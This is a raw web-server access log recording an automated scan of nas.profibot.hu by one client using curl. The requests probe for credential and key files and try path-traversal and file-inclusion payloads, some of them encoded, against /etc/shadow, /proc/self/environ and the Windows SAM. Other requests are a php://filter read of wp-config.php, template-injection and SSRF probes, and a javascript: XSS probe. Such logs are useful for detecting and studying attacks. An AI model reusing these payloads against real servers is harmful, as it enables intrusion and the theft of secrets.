nas.profibot.hu "/public/build/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/coinbase-credentials.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/public/manifest.webmanifest" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - 404 404 - GET https nas.profibot.hu "/etc/courier/pop3d" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:52 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/wandb/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/ws/connect" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/erp/finance_module/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/etc/conf.d/ssmtp" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/api/internal/metadata" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/spectrometer/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/k8s/service.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/cardholder/account_prefs.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/ci_logs/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/components/com_users/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/docker-compose.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/etc/postfix/dkim.key" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/charts/secret-values.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/internal/exec" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/model/torchserve_config.properties" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/admin_console" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/portainer/data.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 403 403 - GET https nas.profibot.hu "/.rbenv-version" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 403 403 - GET https nas.profibot.hu "/.zshrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/finance/config/invoicing_rules.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - 404 404 - GET https nas.profibot.hu "/crm/email/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:53 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/webservice.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/id_rsa" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/etc/lighttpd/lighttpd.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/adminsite/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/_test_server/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 403 403 - GET https nas.profibot.hu "/.well-known/oauth-authorization-server" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/dev/transactions/mock.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/project.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 403 403 - GET https nas.profibot.hu "/..%252f..%252f..%252f..%252f..%252f..%252fvar/log/apache2/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/certs/fullchain.pem" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/admincp" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/opcua/server.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/7zip/settings.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/datadog.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/pristine/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/config/sendgrid.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - - 403 - GET https nas.profibot.hu "/?content=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - - 403 - GET https nas.profibot.hu "/?link=http://" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/administrator/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/transactions/logs.csv" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:54 +0000] - 404 404 - GET https nas.profibot.hu "/api-docs/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/crowdstrike/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/readme.md" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/ws-api/send" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 200 200 - GET https nas.profibot.hu "/?page=php://filter/convert.base64-encode/resource=wp-config.php" [Client 185.177.72.49] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/cache/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/redacted/token_map.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/config/mail.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 403 403 - GET https nas.profibot.hu "/.editorconfig" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/vault/token_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/patient/monitoring_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/report?format={{request}}" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "///////etc/hostname" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/etc/Muttrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/vite.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/deepfake/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/auth/promote" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - - 403 - GET https nas.profibot.hu "/tools/fetch?uri=http://example.com" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/servicemesh/config/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:55 +0000] - 404 404 - GET https nas.profibot.hu "/sitemap.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/ovh/mail/relay_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/braintree-credentials.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/haproxy/haproxy.cfg" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 403 403 - GET https nas.profibot.hu "/wallet/.keystore" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/wc.db" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/project/settings.py" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/interbank/iban_bic_table.csv" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/leads/form-settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/etc/iredmail/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 403 403 - GET https nas.profibot.hu "/..%5c..%5c..%5c..%5c..%5c..%5cproc/self/environ" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/playwright.config.ts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/lua_status" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../WINDOWS/system32/config/SAM" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/monitor/mail/queues" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/index.bak" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/app/config/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/api/v1/debug" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/aml/filters.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/releases/latest.zip" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:56 +0000] - 404 404 - GET https nas.profibot.hu "/alipay/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/auth/jwt/validate" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/admin_area/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/gitlab-ci/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/manifest.webmanifest" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/:8500" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/erp/config.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/wp-json/wc/v3/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - - 403 - GET https nas.profibot.hu "/?page=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/controlnet.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/config/node.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/admin_/admin.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/diagnostics/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/private/admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/forex/api_config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/modules/payment_gateway/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/cms/config.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/android/keystore.jks" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 404 404 - GET https nas.profibot.hu "/recurly/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 403 403 - GET https nas.profibot.hu "/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afvar/log/nginx/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - 403 403 - GET https nas.profibot.hu "/.tor/hidden_service/hostname" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:57 +0000] - - 403 - GET https nas.profibot.hu "/?doc=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/diagnostics" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/beats/filebeat.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/live/stream/auth" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 403 403 - GET https nas.profibot.hu "/.tor/hidden_service/private_key" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/gocd/pipeline.gocd.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/conf/httpd.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/smtp/security_policies.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/square/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/var/log/nginx/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/ingress.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/samsungpay/config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/etc/ssmtp/ssmtp.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/shop/settings.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - - 403 - GET https nas.profibot.hu "/?file=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/config/auth.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/chargify/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 403 403 - GET https nas.profibot.hu "/.hg/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/consul" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/cms-admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/bootstrap/cache/packages.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:58 +0000] - 404 404 - GET https nas.profibot.hu "/track?referrer=javascript:alert(document.domain)" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" 